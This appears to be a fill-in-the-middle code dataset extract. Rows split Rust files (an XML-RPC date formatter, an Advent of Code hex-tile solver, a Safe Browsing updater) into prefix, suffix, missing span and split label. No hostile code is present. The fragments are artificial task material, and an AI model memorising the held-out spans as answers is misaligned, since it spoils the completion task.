use iso8601::{Date, DateTime, Time};
use xml::escape::escape_str_pcdata;
use std::borrow::Cow;
use std::fmt::Write;
/// Escape a string for use as XML characters.
///
/// The resulting string is *not* suitable for use in XML attributes, but XML-RPC doesn't use those.
pub fn
|
(s: &str) -> Cow<'_, str> {
escape_str_pcdata(s)
}
/// Formats a `DateTime` for use in XML-RPC.
///
/// Note that XML-RPC is extremely underspecified when it comes to datetime values. Apparently,
/// some clients [don't even support timezone information][wp-bug] (we do). For maximum
/// interoperability, this will omit fractional time and time zone if not specified.
///
/// [wp-bug]: https://core.trac.wordpress.org/ticket/1633#comment:4
pub fn format_datetime(date_time: &DateTime) -> String {
let Time {
hour,
minute,
second,
millisecond,
tz_offset_hours,
tz_offset_minutes,
} = date_time.time;
match date_time.date {
Date::YMD { year, month, day } => {
// The base format is based directly on the example in the spec and should always work:
let mut string = format!(
"{:04}{:02}{:02}T{:02}:{:02}:{:02}",
year, month, day, hour, minute, second
);
// Only append milliseconds when they're >0
if millisecond > 0 {
write!(string, ".{:.3}", millisecond).unwrap();
}
// Only append time zone info if the offset is specified and not 00:00
if tz_offset_hours!= 0 || tz_offset_minutes!= 0 {
write!(
string,
"{:+03}:{:02}",
tz_offset_hours,
tz_offset_minutes.abs()
)
.unwrap();
}
string
}
// Other format are just not supported at all:
Date::Week {.. } | Date::Ordinal {.. } => unimplemented!(),
}
}
#[cfg(test)]
mod tests {
use super::*;
use iso8601;
#[test]
fn formats_datetimes() {
let date_time = iso8601::datetime("2016-05-02T06:01:05-0830").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05-08:30");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction
let date_time = iso8601::datetime("20160502T06:01:05.400").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction + time zone
let date_time = iso8601::datetime("20160502T06:01:05.400+01:02").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400+01:02");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
}
}
|
escape_xml
|
identifier_name
|
utils.rs
|
use iso8601::{Date, DateTime, Time};
use xml::escape::escape_str_pcdata;
use std::borrow::Cow;
use std::fmt::Write;
/// Escape a string for use as XML characters.
///
/// The resulting string is *not* suitable for use in XML attributes, but XML-RPC doesn't use those.
pub fn escape_xml(s: &str) -> Cow<'_, str> {
escape_str_pcdata(s)
}
/// Formats a `DateTime` for use in XML-RPC.
///
/// Note that XML-RPC is extremely underspecified when it comes to datetime values. Apparently,
/// some clients [don't even support timezone information][wp-bug] (we do). For maximum
/// interoperability, this will omit fractional time and time zone if not specified.
///
/// [wp-bug]: https://core.trac.wordpress.org/ticket/1633#comment:4
pub fn format_datetime(date_time: &DateTime) -> String {
let Time {
hour,
minute,
second,
millisecond,
tz_offset_hours,
tz_offset_minutes,
} = date_time.time;
match date_time.date {
Date::YMD { year, month, day } => {
// The base format is based directly on the example in the spec and should always work:
let mut string = format!(
"{:04}{:02}{:02}T{:02}:{:02}:{:02}",
year, month, day, hour, minute, second
);
// Only append milliseconds when they're >0
if millisecond > 0 {
write!(string, ".{:.3}", millisecond).unwrap();
}
// Only append time zone info if the offset is specified and not 00:00
if tz_offset_hours!= 0 || tz_offset_minutes!= 0 {
write!(
string,
"{:+03}:{:02}",
tz_offset_hours,
tz_offset_minutes.abs()
)
.unwrap();
}
string
}
// Other format are just not supported at all:
Date::Week {.. } | Date::Ordinal {.. } => unimplemented!(),
}
}
#[cfg(test)]
mod tests {
use super::*;
use iso8601;
#[test]
fn formats_datetimes() {
let date_time = iso8601::datetime("2016-05-02T06:01:05-0830").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05-08:30");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction
let date_time = iso8601::datetime("20160502T06:01:05.400").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction + time zone
let date_time = iso8601::datetime("20160502T06:01:05.400+01:02").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400+01:02");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
}
|
}
|
random_line_split
|
|
utils.rs
|
use iso8601::{Date, DateTime, Time};
use xml::escape::escape_str_pcdata;
use std::borrow::Cow;
use std::fmt::Write;
/// Escape a string for use as XML characters.
///
/// The resulting string is *not* suitable for use in XML attributes, but XML-RPC doesn't use those.
pub fn escape_xml(s: &str) -> Cow<'_, str>
|
/// Formats a `DateTime` for use in XML-RPC.
///
/// Note that XML-RPC is extremely underspecified when it comes to datetime values. Apparently,
/// some clients [don't even support timezone information][wp-bug] (we do). For maximum
/// interoperability, this will omit fractional time and time zone if not specified.
///
/// [wp-bug]: https://core.trac.wordpress.org/ticket/1633#comment:4
pub fn format_datetime(date_time: &DateTime) -> String {
let Time {
hour,
minute,
second,
millisecond,
tz_offset_hours,
tz_offset_minutes,
} = date_time.time;
match date_time.date {
Date::YMD { year, month, day } => {
// The base format is based directly on the example in the spec and should always work:
let mut string = format!(
"{:04}{:02}{:02}T{:02}:{:02}:{:02}",
year, month, day, hour, minute, second
);
// Only append milliseconds when they're >0
if millisecond > 0 {
write!(string, ".{:.3}", millisecond).unwrap();
}
// Only append time zone info if the offset is specified and not 00:00
if tz_offset_hours!= 0 || tz_offset_minutes!= 0 {
write!(
string,
"{:+03}:{:02}",
tz_offset_hours,
tz_offset_minutes.abs()
)
.unwrap();
}
string
}
// Other format are just not supported at all:
Date::Week {.. } | Date::Ordinal {.. } => unimplemented!(),
}
}
#[cfg(test)]
mod tests {
use super::*;
use iso8601;
#[test]
fn formats_datetimes() {
let date_time = iso8601::datetime("2016-05-02T06:01:05-0830").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05-08:30");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction
let date_time = iso8601::datetime("20160502T06:01:05.400").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction + time zone
let date_time = iso8601::datetime("20160502T06:01:05.400+01:02").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400+01:02");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
}
}
|
{
escape_str_pcdata(s)
}
|
identifier_body
|
day24.rs
|
use std::collections::HashMap;
use std::collections::HashSet;
use std::io::Read;
use std::mem::swap;
use crate::common::Lines;
use crate::Solution;
type Pos = (i32, i32);
const DIRECTIONS: [Pos; 6] = [(-2, 0), (2, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)];
fn convert_pos(s: &str) -> Pos {
let mut s = s.chars();
let mut x = 0;
let mut y = 0;
while let Some(c) = s.next() {
match c {
'e' => x += 2,
'w' => x -= 2,
'n' |'s' => {
if c == 'n' {
y += 1;
} else {
y -= 1;
}
match s.next() {
Some('e') => x += 1,
Some('w') => x -= 1,
_ => panic!(),
}
}
_ => panic!(),
}
}
(x, y)
}
fn step(current: &HashSet<Pos>, target: &mut HashSet<Pos>) {
let mut black_count: HashMap<Pos, u32> = current.iter().map(|&pos| (pos, 0)).collect();
for &(x, y) in current {
for &(dx, dy) in &DIRECTIONS {
let pos = (x + dx, y + dy);
*black_count.entry(pos).or_default() += 1;
}
}
target.clear();
for (pos, neighbours) in black_count {
let is_black = current.contains(&pos);
let going_black = match neighbours {
1 | 2 if is_black => true,
2 if!is_black => true,
_ => false,
};
if going_black {
target.insert(pos);
}
}
}
fn
|
(input: &mut dyn Read) -> HashSet<Pos> {
let mut black = HashSet::new();
for line in Lines::new(input) {
let pos = convert_pos(&line);
if!black.insert(pos) {
black.remove(&pos);
}
}
black
}
#[derive(Default)]
pub struct Day24;
impl Solution for Day24 {
fn part1(&mut self, input: &mut dyn Read) -> String {
get_black_tiles(input).len().to_string()
}
fn part2(&mut self, input: &mut dyn Read) -> String {
let mut state = get_black_tiles(input);
let mut scratch_pad = state.clone();
for _ in 0..100 {
step(&state, &mut scratch_pad);
swap(&mut state, &mut scratch_pad);
}
state.len().to_string()
}
}
#[cfg(test)]
mod tests {
use crate::test_implementation;
use super::*;
const SAMPLE: &[u8] = include_bytes!("../samples/24.txt");
#[test]
fn test_convert_pos() {
assert_eq!((1, -1), convert_pos("esew"));
assert_eq!((0, 0), convert_pos("nwwswee"));
}
#[test]
fn test_step() {
let state = get_black_tiles(&mut SAMPLE.clone());
let mut target = state.clone();
step(&state, &mut target);
assert_eq!(15, target.len());
}
#[test]
fn sample_part1() {
test_implementation(Day24, 1, SAMPLE, 10);
}
#[test]
fn sample_part2() {
test_implementation(Day24, 2, SAMPLE, 2208);
}
}
|
get_black_tiles
|
identifier_name
|
day24.rs
|
use std::collections::HashMap;
use std::collections::HashSet;
use std::io::Read;
use std::mem::swap;
use crate::common::Lines;
use crate::Solution;
type Pos = (i32, i32);
const DIRECTIONS: [Pos; 6] = [(-2, 0), (2, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)];
fn convert_pos(s: &str) -> Pos {
let mut s = s.chars();
let mut x = 0;
let mut y = 0;
while let Some(c) = s.next() {
match c {
'e' => x += 2,
'w' => x -= 2,
'n' |'s' => {
if c == 'n' {
y += 1;
} else {
y -= 1;
}
match s.next() {
Some('e') => x += 1,
Some('w') => x -= 1,
_ => panic!(),
}
}
_ => panic!(),
}
}
(x, y)
}
fn step(current: &HashSet<Pos>, target: &mut HashSet<Pos>) {
let mut black_count: HashMap<Pos, u32> = current.iter().map(|&pos| (pos, 0)).collect();
for &(x, y) in current {
for &(dx, dy) in &DIRECTIONS {
let pos = (x + dx, y + dy);
*black_count.entry(pos).or_default() += 1;
}
}
target.clear();
for (pos, neighbours) in black_count {
let is_black = current.contains(&pos);
let going_black = match neighbours {
1 | 2 if is_black => true,
2 if!is_black => true,
_ => false,
};
if going_black {
target.insert(pos);
}
}
}
fn get_black_tiles(input: &mut dyn Read) -> HashSet<Pos> {
let mut black = HashSet::new();
for line in Lines::new(input) {
let pos = convert_pos(&line);
if!black.insert(pos) {
black.remove(&pos);
}
}
black
}
#[derive(Default)]
pub struct Day24;
impl Solution for Day24 {
fn part1(&mut self, input: &mut dyn Read) -> String {
get_black_tiles(input).len().to_string()
}
fn part2(&mut self, input: &mut dyn Read) -> String {
let mut state = get_black_tiles(input);
let mut scratch_pad = state.clone();
for _ in 0..100 {
step(&state, &mut scratch_pad);
swap(&mut state, &mut scratch_pad);
}
state.len().to_string()
}
}
#[cfg(test)]
mod tests {
use crate::test_implementation;
use super::*;
const SAMPLE: &[u8] = include_bytes!("../samples/24.txt");
#[test]
fn test_convert_pos() {
assert_eq!((1, -1), convert_pos("esew"));
assert_eq!((0, 0), convert_pos("nwwswee"));
}
#[test]
fn test_step() {
let state = get_black_tiles(&mut SAMPLE.clone());
let mut target = state.clone();
step(&state, &mut target);
assert_eq!(15, target.len());
}
#[test]
fn sample_part1()
|
#[test]
fn sample_part2() {
test_implementation(Day24, 2, SAMPLE, 2208);
}
}
|
{
test_implementation(Day24, 1, SAMPLE, 10);
}
|
identifier_body
|
day24.rs
|
use std::collections::HashMap;
use std::collections::HashSet;
use std::io::Read;
use std::mem::swap;
use crate::common::Lines;
use crate::Solution;
type Pos = (i32, i32);
const DIRECTIONS: [Pos; 6] = [(-2, 0), (2, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)];
fn convert_pos(s: &str) -> Pos {
let mut s = s.chars();
let mut x = 0;
let mut y = 0;
while let Some(c) = s.next() {
match c {
'e' => x += 2,
'w' => x -= 2,
'n' |'s' => {
|
y -= 1;
}
match s.next() {
Some('e') => x += 1,
Some('w') => x -= 1,
_ => panic!(),
}
}
_ => panic!(),
}
}
(x, y)
}
fn step(current: &HashSet<Pos>, target: &mut HashSet<Pos>) {
let mut black_count: HashMap<Pos, u32> = current.iter().map(|&pos| (pos, 0)).collect();
for &(x, y) in current {
for &(dx, dy) in &DIRECTIONS {
let pos = (x + dx, y + dy);
*black_count.entry(pos).or_default() += 1;
}
}
target.clear();
for (pos, neighbours) in black_count {
let is_black = current.contains(&pos);
let going_black = match neighbours {
1 | 2 if is_black => true,
2 if!is_black => true,
_ => false,
};
if going_black {
target.insert(pos);
}
}
}
fn get_black_tiles(input: &mut dyn Read) -> HashSet<Pos> {
let mut black = HashSet::new();
for line in Lines::new(input) {
let pos = convert_pos(&line);
if!black.insert(pos) {
black.remove(&pos);
}
}
black
}
#[derive(Default)]
pub struct Day24;
impl Solution for Day24 {
fn part1(&mut self, input: &mut dyn Read) -> String {
get_black_tiles(input).len().to_string()
}
fn part2(&mut self, input: &mut dyn Read) -> String {
let mut state = get_black_tiles(input);
let mut scratch_pad = state.clone();
for _ in 0..100 {
step(&state, &mut scratch_pad);
swap(&mut state, &mut scratch_pad);
}
state.len().to_string()
}
}
#[cfg(test)]
mod tests {
use crate::test_implementation;
use super::*;
const SAMPLE: &[u8] = include_bytes!("../samples/24.txt");
#[test]
fn test_convert_pos() {
assert_eq!((1, -1), convert_pos("esew"));
assert_eq!((0, 0), convert_pos("nwwswee"));
}
#[test]
fn test_step() {
let state = get_black_tiles(&mut SAMPLE.clone());
let mut target = state.clone();
step(&state, &mut target);
assert_eq!(15, target.len());
}
#[test]
fn sample_part1() {
test_implementation(Day24, 1, SAMPLE, 10);
}
#[test]
fn sample_part2() {
test_implementation(Day24, 2, SAMPLE, 2208);
}
}
|
if c == 'n' {
y += 1;
} else {
|
random_line_split
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct
|
{
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else {
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
}
}
|
GSBUpdater
|
identifier_name
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct GSBUpdater {
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
|
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else {
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
}
}
|
random_line_split
|
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct GSBUpdater {
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else
|
}
}
|
{
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
|
conditional_block
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct GSBUpdater {
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
|
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else {
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
}
}
|
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
|
identifier_body
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.